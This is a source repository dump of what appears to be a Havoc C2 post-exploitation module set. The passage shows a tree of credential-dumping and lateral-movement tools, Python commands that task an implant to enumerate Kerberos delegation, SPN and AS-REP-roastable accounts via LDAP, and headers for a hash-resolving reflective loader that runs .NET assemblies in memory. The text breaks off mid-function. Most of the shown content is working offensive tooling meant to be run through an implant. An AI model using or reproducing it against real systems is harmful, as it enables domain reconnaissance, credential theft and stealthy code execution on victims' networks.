├── .github └── workflows │ └── build.yml ├── .gitmodules ├── Bofbelt ├── ObjectFiles │ ├── dir.x64.o │ ├── dir.x86.o │ ├── enumlocalsessions.x64.o │ ├── enumlocalsessions.x86.o │ ├── env.x64.o │ ├── env.x86.o │ ├── ipconfig.x64.o │ ├── ipconfig.x86.o │ ├── ldapsearch.x64.o │ ├── ldapsearch.x86.o │ ├── netuserenum.x64.o │ ├── netuserenum.x86.o │ ├── reg_query.x64.o │ ├── reg_query.x86.o │ ├── tasklist.x64.o │ ├── tasklist.x86.o │ ├── uptime.x64.o │ ├── uptime.x86.o │ ├── whoami.x64.o │ ├── whoami.x86.o │ ├── windowlist.x64.o │ ├── windowlist.x86.o │ ├── wmi_query.x64.o │ └── wmi_query.x86.o ├── bofbelt.py ├── browser.json ├── defensive.json └── interesting.json ├── Delegation ├── bin │ ├── ldapsearch.x64.o │ └── ldapsearch.x86.o └── delegation.py ├── Domaininfo ├── Domaininfo.o └── Domaininfo.py ├── InvokeAssembly ├── CMakeLists.txt ├── bin │ └── InvokeAssembly.x64.dll ├── include │ ├── DModule.h │ ├── InvokeAssembly.h │ ├── KaynLdr.h │ ├── Native.h │ ├── Parser.h │ └── Win32.h ├── invokeassembly.py ├── makefile └── src │ ├── DllMain.c │ ├── InvokeAssembly.c │ ├── KaynLdr.c │ ├── Parser.c │ ├── Util.s │ └── Win32.c ├── Jump-exec ├── DCOM │ └── dcom.x86.o ├── Psexec │ ├── beacon.h │ ├── makefile │ ├── psexec.c │ ├── psexec.py │ ├── psexec.x64.o │ └── psexec.x86.o ├── ScShell │ ├── beacon.h │ ├── makefile │ ├── scshell.c │ ├── scshell.py │ ├── scshell.x64.o │ └── scshell.x86.o ├── WMI │ ├── EventSub │ │ ├── bin │ │ │ └── EventSub.x64.o │ │ ├── include │ │ │ └── beacon.h │ │ ├── makefile │ │ └── source │ │ │ └── WMI-EventSub.cpp │ ├── ProcCreate │ │ ├── bin │ │ │ └── ProcCreate.x64.o │ │ ├── include │ │ │ └── beacon.h │ │ ├── makefile │ │ └── source │ │ │ └── WMI-ProcessCreate.cpp │ ├── makefile │ └── wmi.py └── makefile ├── Migrate └── auto_migrate.py ├── NoConsolation ├── bin │ ├── NoConsolation.x64.o │ └── NoConsolation.x86.o ├── makefile └── no-consolation.py ├── Packer └── packer.py ├── PowerPick ├── CMakeLists.txt ├── bin │ └── PowerPick.x64.dll ├── include │ 
├── DModule.h │ ├── InvokeAssembly.h │ ├── KaynLdr.h │ ├── Native.h │ ├── Parser.h │ ├── PowershellRunner.h │ └── Win32.h ├── makefile ├── powerpick.py └── src │ ├── DllMain.c │ ├── InvokeAssembly.c │ ├── KaynLdr.c │ ├── Parser.c │ ├── Util.s │ └── Win32.c ├── README.md ├── RemoteOps ├── RemoteOps.py ├── bin │ ├── adcs_request.x64.o │ ├── adcs_request.x86.o │ ├── adduser.x64.o │ ├── adduser.x86.o │ ├── addusertogroup.x64.o │ ├── addusertogroup.x86.o │ ├── enableuser.x64.o │ ├── enableuser.x86.o │ ├── reg_delete.x64.o │ ├── reg_delete.x86.o │ ├── reg_save.x64.o │ ├── reg_save.x86.o │ ├── reg_set.x64.o │ ├── reg_set.x86.o │ ├── sc_create.x64.o │ ├── sc_create.x86.o │ ├── sc_delete.x64.o │ ├── sc_delete.x86.o │ ├── sc_description.x64.o │ ├── sc_description.x86.o │ ├── sc_start.x64.o │ ├── sc_start.x86.o │ ├── sc_stop.x64.o │ ├── sc_stop.x86.o │ ├── setuserpass.x64.o │ └── setuserpass.x86.o └── makefile ├── SamDump ├── README.md ├── makefile ├── regdump.x64.o ├── regdump.x86.o ├── samdump.py └── source │ ├── beacon.h │ ├── common.h │ ├── entry.c │ ├── entry_x64.o │ └── entry_x86.o ├── SituationalAwareness ├── ObjectFiles │ ├── adcs_enum.x64.o │ ├── adcs_enum.x86.o │ ├── arp.x64.o │ ├── arp.x86.o │ ├── cacls.x64.o │ ├── cacls.x86.o │ ├── dir.x64.o │ ├── dir.x86.o │ ├── driversigs.x64.o │ ├── driversigs.x86.o │ ├── enum_filter_driver.x64.o │ ├── enum_filter_driver.x86.o │ ├── enumlocalsessions.x64.o │ ├── enumlocalsessions.x86.o │ ├── env.x64.o │ ├── env.x86.o │ ├── get-netsession.x64.o │ ├── get-netsession.x86.o │ ├── get_password_policy.x64.o │ ├── get_password_policy.x86.o │ ├── ipconfig.x64.o │ ├── ipconfig.x86.o │ ├── ldapsearch.x64.o │ ├── ldapsearch.x86.o │ ├── list_firewall_rules.x64.o │ ├── list_firewall_rules.x86.o │ ├── listdns.x64.o │ ├── listdns.x86.o │ ├── locale.x64.o │ ├── locale.x86.o │ ├── netgroup.x64.o │ ├── netgroup.x86.o │ ├── netlocalgroup.x64.o │ ├── netlocalgroup.x86.o │ ├── netshares.x64.o │ ├── netshares.x86.o │ ├── netstat.x64.o │ ├── 
netstat.x86.o │ ├── netuptime.x64.o │ ├── netuptime.x86.o │ ├── netuser.x64.o │ ├── netuser.x86.o │ ├── netuserenum.x64.o │ ├── netuserenum.x86.o │ ├── netview.x64.o │ ├── netview.x86.o │ ├── nslookup.x64.o │ ├── nslookup.x86.o │ ├── quser.x64.o │ ├── quser.x86.o │ ├── reg_query.x64.o │ ├── reg_query.x86.o │ ├── resources.x64.o │ ├── resources.x86.o │ ├── routeprint.x64.o │ ├── routeprint.x86.o │ ├── sc_enum.x64.o │ ├── sc_enum.x86.o │ ├── sc_qc.x64.o │ ├── sc_qc.x86.o │ ├── sc_qdescription.x64.o │ ├── sc_qdescription.x86.o │ ├── sc_qfailure.x64.o │ ├── sc_qfailure.x86.o │ ├── sc_qtriggerinfo.x64.o │ ├── sc_qtriggerinfo.x86.o │ ├── sc_query.x64.o │ ├── sc_query.x86.o │ ├── schtasksenum.x64.o │ ├── schtasksenum.x86.o │ ├── schtasksquery.x64.o │ ├── schtasksquery.x86.o │ ├── tasklist.x64.o │ ├── tasklist.x86.o │ ├── uptime.x64.o │ ├── uptime.x86.o │ ├── whoami.x64.o │ ├── whoami.x86.o │ ├── windowlist.x64.o │ ├── windowlist.x86.o │ ├── wmi_query.x64.o │ └── wmi_query.x86.o ├── SituationalAwareness.py └── makefile ├── Template ├── CMakeLists.txt ├── bin │ └── Template.x64.dll ├── include │ ├── DModule.h │ ├── KaynLdr.h │ ├── Native.h │ ├── Parser.h │ └── Win32.h ├── makefile ├── src │ ├── DllMain.c │ ├── KaynLdr.c │ ├── Parser.c │ ├── Util.s │ └── Win32.c └── template.py ├── makefile ├── mimidrv ├── dist │ └── mimidrv.x64.o ├── include │ ├── beacon.h │ └── entry.h ├── makefile ├── mimidrv.py └── source │ └── entry.c ├── nanodump ├── bin │ ├── nanodump.x64.o │ ├── nanodump.x86.o │ ├── nanodump_ppl_dump.x64.dll │ ├── nanodump_ppl_dump.x64.o │ ├── nanodump_ppl_medic.x64.dll │ ├── nanodump_ppl_medic.x64.o │ ├── nanodump_ssp.x64.dll │ └── nanodump_ssp.x64.o ├── makefile └── nanodump.py └── nanorobeus ├── bin ├── nanorobeus.x64.o └── nanorobeus.x86.o ├── include ├── base64.h ├── beacon.h ├── bofdefs.h ├── common.h ├── kerberoast.h ├── klist.h ├── krb5.h ├── luid.h ├── msasn1.h ├── ptt.h ├── purge.h ├── sessions.h └── tgtdeleg.h ├── makefile ├── nanorobeus.py └── src ├── 
base64.c ├── common.c ├── entry.c ├── kerberoast.c ├── klist.c ├── krb5.c ├── luid.c ├── ptt.c ├── purge.c ├── sessions.c └── tgtdeleg.c /.github/workflows/build.yml: -------------------------------------------------------------------------------- 1 | name: build 2 | 3 | on: [pull_request, push] 4 | 5 | jobs: 6 | build: 7 | runs-on: ubuntu-latest 8 | 9 | steps: 10 | - name: Checkout Repository 11 | uses: actions/checkout@v2 12 | 13 | - name: Set up MinGW 14 | uses: egor-tensin/setup-mingw@v2 15 | with: 16 | platform: x64 17 | 18 | - name: apt update 19 | run: sudo apt-get update 20 | 21 | - name: Install pefile 22 | run: sudo apt-get -y install python3-pefile 23 | 24 | - name: Install nasm 25 | run: sudo apt-get -y install nasm 26 | 27 | - name: Build BOFs 28 | run: make 29 | -------------------------------------------------------------------------------- /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "RemoteOps/CS-Remote-OPs-BOF"] 2 | path = RemoteOps/CS-Remote-OPs-BOF 3 | url = https://github.com/trustedsec/CS-Remote-OPs-BOF 4 | 5 | [submodule "NoConsolation/No-Consolation"] 6 | path = NoConsolation/No-Consolation 7 | url = https://github.com/fortra/No-Consolation 8 | 9 | [submodule "nanodump/nanodump"] 10 | path = nanodump/nanodump 11 | url = https://github.com/fortra/nanodump 12 | 13 | [submodule "SituationalAwareness/CS-Situational-Awareness-BOF"] 14 | path = SituationalAwareness/CS-Situational-Awareness-BOF 15 | url = https://github.com/trustedsec/CS-Situational-Awareness-BOF 16 | 17 | -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/dir.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/dir.x64.o -------------------------------------------------------------------------------- 
/Bofbelt/ObjectFiles/dir.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/dir.x86.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/enumlocalsessions.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/enumlocalsessions.x64.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/enumlocalsessions.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/enumlocalsessions.x86.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/env.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/env.x64.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/env.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/env.x86.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/ipconfig.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/ipconfig.x64.o -------------------------------------------------------------------------------- 
/Bofbelt/ObjectFiles/ipconfig.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/ipconfig.x86.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/ldapsearch.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/ldapsearch.x64.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/ldapsearch.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/ldapsearch.x86.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/netuserenum.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/netuserenum.x64.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/netuserenum.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/netuserenum.x86.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/reg_query.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/reg_query.x64.o 
-------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/reg_query.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/reg_query.x86.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/tasklist.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/tasklist.x64.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/tasklist.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/tasklist.x86.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/uptime.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/uptime.x64.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/uptime.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/uptime.x86.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/whoami.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/whoami.x64.o 
-------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/whoami.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/whoami.x86.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/windowlist.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/windowlist.x64.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/windowlist.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/windowlist.x86.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/wmi_query.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/wmi_query.x64.o -------------------------------------------------------------------------------- /Bofbelt/ObjectFiles/wmi_query.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Bofbelt/ObjectFiles/wmi_query.x86.o -------------------------------------------------------------------------------- /Bofbelt/browser.json: -------------------------------------------------------------------------------- 1 | {"chrome": "Google Chrome","iexplore": "Microsoft Internet Explorer","microsoftedge": "Microsoft Edge","firefox": "Mozilla Firefox","brave": 
"Brave Browser","opera": "Opera Browser"} -------------------------------------------------------------------------------- /Bofbelt/interesting.json: -------------------------------------------------------------------------------- 1 | {"cmrcservice": "Configuration Manager Remote Control Service","ftp": "Misc. FTP client","lmiguardian": "LogMeIn Reporter","logmeinsystray": "LogMeIn System Tray","ramaint": "LogMeIn maintenance sevice","mmc": "Microsoft Management Console","putty": "Putty SSH client","pscp": "Putty SCP client","psftp": "Putty SFTP client","puttytel": "Putty Telnet client","plink": "Putty CLI client","pageant": "Putty SSH auth agent","kitty": "Kitty SSH client","telnet": "Misc. Telnet client","securecrt": "SecureCRT SSH/Telnet client","teamviewer": "TeamViewer","tv_x64": "TeamViewer x64 remote control","tv_w32": "TeamViewer x86 remote control","keepass": "KeePass password vault","mstsc": "Microsoft RDP client","vnc": "Possible VNC client","powershell": "PowerShell host process","cmd": "Command Prompt","kaseya.agentendpoint.exe": "Command Prompt"} -------------------------------------------------------------------------------- /Delegation/bin/ldapsearch.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Delegation/bin/ldapsearch.x64.o -------------------------------------------------------------------------------- /Delegation/bin/ldapsearch.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Delegation/bin/ldapsearch.x86.o -------------------------------------------------------------------------------- /Delegation/delegation.py: -------------------------------------------------------------------------------- 1 | from havoc import Demon, RegisterCommand, RegisterModule 2 | import re 3 | 4 
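def _run_ldapsearch( demon, query, attributes ):
    """Pack an ldapsearch request and task *demon* to run the bundled BOF.

    Argument layout consumed by bin/ldapsearch.<arch>.o, in order: LDAP
    filter, comma-separated attribute list, uint32 result limit, hostname,
    domain. The last three are not configurable from these commands and are
    always sent as 0, '' and ''.

    Returns the console task id from ConsoleWrite.
    """
    # NOTE(review): Packer is not imported in this file; presumably provided by
    # the Havoc client runtime — confirm.
    packer = Packer()
    packer.addstr( query )
    packer.addstr( attributes )
    packer.adduint32( 0 )
    packer.addstr( '' )
    packer.addstr( '' )

    TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to run ldap query" )
    demon.InlineExecute( TaskID, "go", f"bin/ldapsearch.{demon.ProcessArch}.o", packer.getbuffer(), False )

    return TaskID


# LDAP filters per delegation type, keyed by the lower-cased first command
# parameter. 1.2.840.113556.1.4.803 is the bitwise-AND matching rule on
# userAccountControl; primaryGroupID 515 is Domain Computers; the (!(...:=2))
# clause in the rbcd filter excludes disabled accounts.
_DELEGATION_QUERIES = {
    'constrained': '(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=16777216))',
    'unconstrained': '(&(objectClass=computer)(primarygroupid=515)(userAccountControl:1.2.840.113556.1.4.803:=524288))',
    'rbcd': '(&(msDS-AllowedToActOnBehalfOfOtherIdentity=*)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
}

# Attributes requested for each delegation type.
_DELEGATION_ATTRS = {
    'constrained': 'sAMAccountName,msDS-AllowedToDelegateTo',
    'unconstrained': 'sAMAccountName',
    'rbcd': 'sAMAccountName'
}

# Enabled user objects (samAccountType 805306368) other than krbtgt that carry
# a servicePrincipalName.
_SPN_QUERY = '(&(samAccountType=805306368)(!samAccountName=krbtgt)(serviceprincipalname=*)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
_SPN_ATTRS = 'sAMAccountName,servicePrincipalName'

# Enabled accounts with userAccountControl bit 4194304 (pre-authentication not
# required) set.
_ASREP_QUERY = '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
_ASREP_ATTRS = 'sAMAccountName'


def get_delegation( demonID, *params ):
    """Enumerate computer accounts with a given Kerberos delegation setting.

    Args:
        demonID: id of the demon to task.
        *params: exactly one value, the delegation type — 'constrained',
            'unconstrained' or 'rbcd' (case-insensitive).

    Returns:
        The console task id on success, or False after writing an error to
        the demon console when the parameter is missing, more than one is
        given, or the type is unknown.
    """
    demon = Demon( demonID )
    count = len( params )

    if count < 1:
        demon.ConsoleWrite( demon.CONSOLE_ERROR, "Not enough parameters" )
        return False

    if count > 1:
        demon.ConsoleWrite( demon.CONSOLE_ERROR, "Too many parameters" )
        return False

    kind = params[ 0 ].lower()
    if kind not in _DELEGATION_QUERIES:
        demon.ConsoleWrite( demon.CONSOLE_ERROR, "Wrong first parameter" )
        return False

    # The former >= 2 ... >= 5 parameter branches were unreachable behind the
    # guards above and have been dropped; limit/host/domain stay fixed.
    return _run_ldapsearch( demon, _DELEGATION_QUERIES[ kind ], _DELEGATION_ATTRS[ kind ] )


def get_spns( demonID, *params ):
    """Enumerate user accounts that have a servicePrincipalName set.

    Accepts no parameters; any parameter is rejected with a console error and
    False. Returns the console task id otherwise.
    """
    demon = Demon( demonID )

    if len( params ) > 0:
        demon.ConsoleWrite( demon.CONSOLE_ERROR, "Too many parameters" )
        return False

    return _run_ldapsearch( demon, _SPN_QUERY, _SPN_ATTRS )


def get_asrep( demonID, *params ):
    """Enumerate user accounts that do not require Kerberos pre-authentication.

    At most one parameter is accepted (kept for compatibility with existing
    callers; it is not used). More than one is rejected with a console error
    and False. Returns the console task id otherwise.
    """
    demon = Demon( demonID )

    if len( params ) > 1:
        demon.ConsoleWrite( demon.CONSOLE_ERROR, "Too many parameters" )
        return False

    return _run_ldapsearch( demon, _ASREP_QUERY, _ASREP_ATTRS )


RegisterCommand( get_delegation, "", "get-delegation", "Enumerate a given domain for different types of abusable Kerberos Delegation settings.", 0, "[Constrained,Unconstrained,RBCD]", "constrained" )
RegisterCommand( get_spns, "", "get-spns", "Enumerate a given domain for user accounts with SPNs.", 0, "", "" )
RegisterCommand( get_asrep, "", "get-asrep", "Enumerate a given domain for user accounts with ASREP.", 0, "", "" )
--------------------------------------------------------------------------------
/Domaininfo/Domaininfo.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Domaininfo/Domaininfo.o
--------------------------------------------------------------------------------
/Domaininfo/Domaininfo.py:
--------------------------------------------------------------------------------
from havoc import Demon, RegisterCommand
from struct import pack, calcsize


def dcenum(demonID, *param):
    """Task an x64 demon to run Domaininfo.o with no arguments.

    Args:
        demonID: id of the demon to task.
        *param: accepted for the command signature but not used.

    Returns:
        The console task id, or False after writing an error to the console
        when the demon is x86.
    """
    demon = Demon( demonID )

    if demon.ProcessArch == "x86":
        demon.ConsoleWrite( demon.CONSOLE_ERROR, "x86 is not supported" )
        return False

    TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to enumerate domain information using Active Directory Domain Services" )

    # NOTE(review): the object path is bare ("Domaininfo.o") whereas the other
    # modules use "bin/<name>.<arch>.o" — confirm where the client resolves it.
    demon.InlineExecute( TaskID, "go", "Domaininfo.o", b'', False )

    return TaskID


RegisterCommand( dcenum, "", "dcenum", "enumerate domain information using Active Directory Domain Services", 0, "", "" )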
--------------------------------------------------------------------------------
/InvokeAssembly/CMakeLists.txt:
--------------------------------------------------------------------------------
cmake_minimum_required( VERSION 3.19 )
project( InvokeAssembly C )

set( PROJECT_NAME InvokeAssembly )

# set compiler settings
set( CMAKE_C_STANDARD 11 )
set( CMAKE_C_COMPILER x86_64-w64-mingw32-gcc )

# adding demon sources
include_directories( include )

set( COMMON_SOURCE
    src/Win32.c
    src/KaynLdr.c
    src/DllMain.c
    src/Parser.c
    src/InvokeAssembly.c
)


# add compiled demons
# NOTE(review): this produces an executable, while the makefile links the same
# sources plus src/Util.s (absent here) into bin/InvokeAssembly.x64.dll with
# -shared. The two build descriptions disagree — confirm which is authoritative.
add_executable( ${PROJECT_NAME} ${COMMON_SOURCE} )
--------------------------------------------------------------------------------
/InvokeAssembly/bin/InvokeAssembly.x64.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/InvokeAssembly/bin/InvokeAssembly.x64.dll
--------------------------------------------------------------------------------
/InvokeAssembly/include/DModule.h:
--------------------------------------------------------------------------------

/* NOTE(review): the header names of these #include lines are missing in this
 * copy of the file. WIN32_FUNC comes from KaynLdr.h, so that must be one of them. */
#include
#include
#include

/* Per-module state shared with DllMain.c: the two imported functions the
 * module calls through pointers, and the module handles they were resolved
 * from. Filled in by ModuleInit(). */
typedef struct _INSTANCE {

    struct {

        WIN32_FUNC( printf )
        WINBASEAPI HRESULT ( WINAPI *CLRCreateInstance ) ( REFCLSID clsid, REFIID riid, LPVOID* ppInterface );

    } Win32;

    struct {

        PVOID Msvcrt;
        PVOID Mscoree;

    } Modules;

} INSTANCE, *PINSTANCE;

/* Single global instance, defined in DllMain.c. */
extern INSTANCE Instance;

VOID ModuleInit();
/* NOTE(review): declared with an empty parameter list here but defined as
 * ModuleMain( PVOID Params ) in DllMain.c — make the prototype match. */
VOID ModuleMain();
--------------------------------------------------------------------------------
/InvokeAssembly/include/KaynLdr.h:
--------------------------------------------------------------------------------
/**
 * KaynLdr
 * Author: Paul Ungur (@C5pider)
 *
 * Declarations for the loader that maps this DLL in memory: ntdll and a few
 * of its exports are located by precomputed string hash (KGetModuleByHash /
 * KGetProcAddressByHash) instead of through an import table, after which the
 * mapped image's sections, base relocations and IAT are fixed up.
 */

#ifndef KAYNLDR_KAYNLDR_H
#define KAYNLDR_KAYNLDR_H

#define _NO_NTDLL_CRT_

/* NOTE(review): include targets missing in this copy of the file. */
#include
#include

/* Custom DllMain reason code (see DllMain.c) used to hand the module base back
 * to the caller through lpReserved. */
#define DLL_QUERY_HMODULE 6

/* Seed for the string hash; presumably the initial value used by KHashString
 * — confirm against its definition (not on this page). */
#define HASH_KEY 5381

#ifdef _WIN64
#define PPEB_PTR __readgsqword( 0x60 )
#else
/* NOTE(review): __readgsqword is the 64-bit intrinsic; a 32-bit build would
 * read the PEB pointer from fs:[0x30]. Only the x64 target is built by the
 * makefile, so this branch is never exercised. */
#define PPEB_PTR __readgsqword( 0x30 )
#endif

#define MemCopy __builtin_memcpy
/* Precomputed hashes of the module / export names resolved at load time. */
#define NTDLL_HASH 0x70e61753

#define SYS_LDRLOADDLL 0x9e456a43
#define SYS_NTALLOCATEVIRTUALMEMORY 0xf783b8ec
#define SYS_NTPROTECTEDVIRTUALMEMORY 0x50e92888

#define DLLEXPORT __declspec( dllexport )
/* Declares a function pointer named x with the type of the Win32 function x.
 * The expansion already ends in ';'. */
#define WIN32_FUNC( x ) __typeof__( x ) * x;

#define U_PTR( x ) ( ( UINT_PTR ) x )
#define C_PTR( x ) ( ( LPVOID ) x )

/* Loader-private state: the three ntdll functions it needs and ntdll's base. */
typedef struct {

    struct {
        /* NOTE(review): the trailing ';' here is redundant (empty declaration). */
        WIN32_FUNC( LdrLoadDll );
        WIN32_FUNC( NtAllocateVirtualMemory )
        WIN32_FUNC( NtProtectVirtualMemory )
    } Win32;

    struct {
        PVOID Ntdll;
    } Modules ;

} KAYNINSTANCE, *PKAYNINSTANCE ;

LPVOID KaynCaller();

/* One IMAGE_BASE_RELOCATION entry: 12-bit page offset, 4-bit relocation type. */
typedef struct {
    WORD offset :12;
    WORD type :4;
} *PIMAGE_RELOC;

PVOID KGetModuleByHash( DWORD hash );
PVOID KGetProcAddressByHash( PKAYNINSTANCE Instance, PVOID DllModuleBase, DWORD FunctionHash, DWORD Ordinal );
PVOID KLoadLibrary( PKAYNINSTANCE Instance, LPSTR Module );

VOID KResolveIAT( PKAYNINSTANCE Instance, PVOID KaynImage, PVOID IatDir );
VOID KReAllocSections( PVOID KaynImage, PVOID ImageBase, PVOID Dir );

/* Minimal CRT replacements; the loader cannot rely on msvcrt being resolved. */
DWORD KHashString( LPVOID String, SIZE_T Size );
SIZE_T KStringLengthA( LPCSTR String );
SIZE_T KStringLengthW( LPCWSTR String );
VOID KMemSet( PVOID Destination, INT Value, SIZE_T Size );
SIZE_T KCharStringToWCharString( PWCHAR Destination, PCHAR Source, SIZE_T MaximumAllowed );

#endif
--------------------------------------------------------------------------------
/InvokeAssembly/include/Parser.h:
--------------------------------------------------------------------------------

/* NOTE(review): include target missing in this copy of the file. */
#include

/* Read cursor over the argument buffer handed to the DLL. Field semantics are
 * inferred from the names (original = start of buffer, buffer = current read
 * position, length = bytes remaining?) — Parser.c is not on this page; confirm. */
typedef struct {
    PCHAR original;
    PCHAR buffer;
    UINT32 length;
} PARSER, *PPARSER ;

VOID ParserNew( PPARSER parser, PCHAR buffer );
INT ParserGetInt32( PPARSER parser);
/* NOTE(review): size is PINT, but InvokeAssembly.c passes the address of
 * SIZE_T locals; on x64 only the low 32 bits are written. Use PSIZE_T here
 * or INT locals there so the types agree. */
PCHAR ParserGetBytes( PPARSER parser, PINT size);
--------------------------------------------------------------------------------
/InvokeAssembly/include/Win32.h:
--------------------------------------------------------------------------------

#include
#include

/* ANSI -> UTF-16 copy, bounded by MaximumAllowed. A second copy of this
 * helper exists as KCharStringToWCharString in KaynLdr.h. */
SIZE_T CharStringToWCharString(PWCHAR Destination, PCHAR Source, SIZE_T MaximumAllowed);
--------------------------------------------------------------------------------
/InvokeAssembly/invokeassembly.py:
--------------------------------------------------------------------------------

from havoc import Demon, RegisterCommand

def InvokeAssembly( demonID, *param ):
    """Task an x64 demon to spawn a process, load bin/InvokeAssembly.x64.dll and run a .NET assembly.

    param[0] is the local path of the assembly; param[1:] are its arguments.
    Returns the console task id, False on an x86 demon, and None when the
    arguments are missing or the file cannot be opened (the three error
    paths do not return a consistent value).
    """
    TaskID : str = None
    demon : Demon = None
    Assembly : str = None
    # NOTE(review): Packer is not imported in this file; presumably provided by
    # the Havoc client runtime — confirm.
    packer = Packer()

    demon = Demon( demonID )

    if demon.ProcessArch == 'x86':
        demon.ConsoleWrite( demon.CONSOLE_ERROR, "x86 is not supported" )
        return False

    # NOTE(review): the "Tasked demon ..." line is written before the argument
    # check below, so a rejected call still reports a task on the console.
    TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon spawn and inject an assembly executable" )

    # NOTE(review): this requires at least one argument after the path, although
    # the registered usage string marks "(args)" as optional.
    if len( param ) < 2:
